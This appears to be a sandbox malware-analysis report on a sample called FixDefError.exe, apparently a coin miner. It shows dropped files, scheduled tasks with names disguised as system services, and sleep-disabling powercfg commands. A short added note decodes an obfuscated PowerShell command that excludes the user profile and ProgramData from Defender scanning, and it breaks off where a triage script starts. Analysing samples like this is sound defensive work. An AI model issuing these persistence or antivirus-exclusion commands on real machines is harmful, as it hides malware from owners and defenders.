      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Code function: 1_2_00F7CA40
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Code function: 1_2_00F70B47
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Code function: 1_2_00F710B0
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Code function: 1_2_00F733C8
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Code function: 1_2_00F733B9
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Code function: 1_2_00F77958
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Code function: 1_2_00F77D80
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Code function: 1_2_00F77FAE
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe | Code function: 56_2_02400B00
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe | Code function: 56_2_02406CAC
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe | Code function: 56_2_02407670
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe | Code function: 56_2_02401EC8
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe | Code function: 56_2_02402860
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe | Code function: 56_2_024033A0
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe | Code function: 56_2_02407660
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe | Code function: 56_2_02407669
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe | Code function: 56_2_02403528
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe | Code function: 56_2_02403538
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe | Code function: 56_2_02401E5E
      Source: FixDefError.exe, 00000000.00000002.302610547.0000000005B07000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameImpulse.exe> vs FixDefError.exe
      Source: FixDefError.exe, 00000000.00000000.245216110.0000000000562000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameProgramInstaller.exeB vs FixDefError.exe
      Source: FixDefError.exe, 00000000.00000002.272580789.0000000000B39000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs FixDefError.exe
      Source: FixDefError.exe | Binary or memory string: OriginalFilenameProgramInstaller.exeB vs FixDefError.exe
      Source: C:\Windows\System32\svchost.exe | Section loaded: xboxlivetitleid.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: cdpsgshims.dll
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | File created: C:\ProgramData\RuntimeBrokerData\WinRing0x64.sys
      Source: svhost.exe.1.dr | Static PE information: Number of sections : 11 > 10
      Source: Joe Sandbox View | Dropped File: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe A5ABDD354FCF673AD85A3A9D467B6184F46EF50FC300BA78C8ABABBDCABCA96D
      Source: ProgramStarter.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: FixDefError.exe | ReversingLabs: Detection: 25%
      Source: FixDefError.exe | Virustotal: Detection: 39%
      Source: FixDefError.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\FixDefError.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknown | Process created: C:\Users\user\Desktop\FixDefError.exe C:\Users\user\Desktop\FixDefError.exe
      Source: C:\Users\user\Desktop\FixDefError.exe | Process created: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe "C:\Users\user\AppData\Local\Temp\ProgramStarter.exe"
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C powershell -EncodedCommand "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
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "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"
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk697" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk64" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk620" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
      Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk697" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk64" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk620" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-dc 0
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0
      Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-dc 0
      Source: unknown | Process created: C:\ProgramData\RuntimeBrokerData\RegSvc.exe C:\ProgramData\RuntimeBrokerData\RegSvc.exe
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /hibernate off
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
      Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
      Source: unknown | Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
      Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k netsvcs -p
      Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 1251
      Source: C:\Windows\SysWOW64\powercfg.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\FixDefError.exe | Process created: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe "C:\Users\user\AppData\Local\Temp\ProgramStarter.exe"
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C powershell -EncodedCommand "PAAjAHMAVQBCAHYAVgBJAEcAcABFAEoAbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAYwBJAFQAWQBjAHAAQgBHAEwAVgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAagB0AEcAZAB6AFEAYwBUAEUATQBPAGwAZQBKAFYAcAB3AGkAbAAjAD4AIABAACgAIAA8ACMARgBvAEwAVABHAFkAcwBGAHEAcwByAGkAWQB5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBwAEsAUABlAHYARgBGAGwAUgBOAGkAWgBFAFAAWABLAGgATgBJACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBRAFUAQgBKAHkAdgBlAEsARgBUACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEkAcQBjAFcAcQBHAEYAagBSAGMATQBFAGgAWQBzAHUAYgAjAD4A
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk697" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk64" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk620" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "[encoded command, identical to the one on the cmd.exe line above]"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk697" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk64" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk620" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /hibernate off
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
Source: C:\Windows\System32\svchost.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 1251
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
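The -EncodedCommand argument in the ProgramStarter.exe to cmd.exe entry above is base64 over UTF-16LE text, and the script it carries scatters its real tokens between random `<# ... #>` block comments, so a plain string search never sees `Add-MpPreference -ExclusionPath` as one contiguous phrase. Decoded and stripped of the comment padding, it reads `Add-MpPreference -ExclusionPath @( $env:UserProfile, $env:ProgramData) -Force`, which excludes the whole user profile and C:\ProgramData (where the miner components are dropped) from Defender scanning. The Python below is an added triage example; it is not part of the Joe Sandbox report or of the sample. ENCODED_COMMAND is the exact string from the report; the tampering heuristic at the end (which cmdlets and switches count as Defender tampering) is an assumption of the example.

```python
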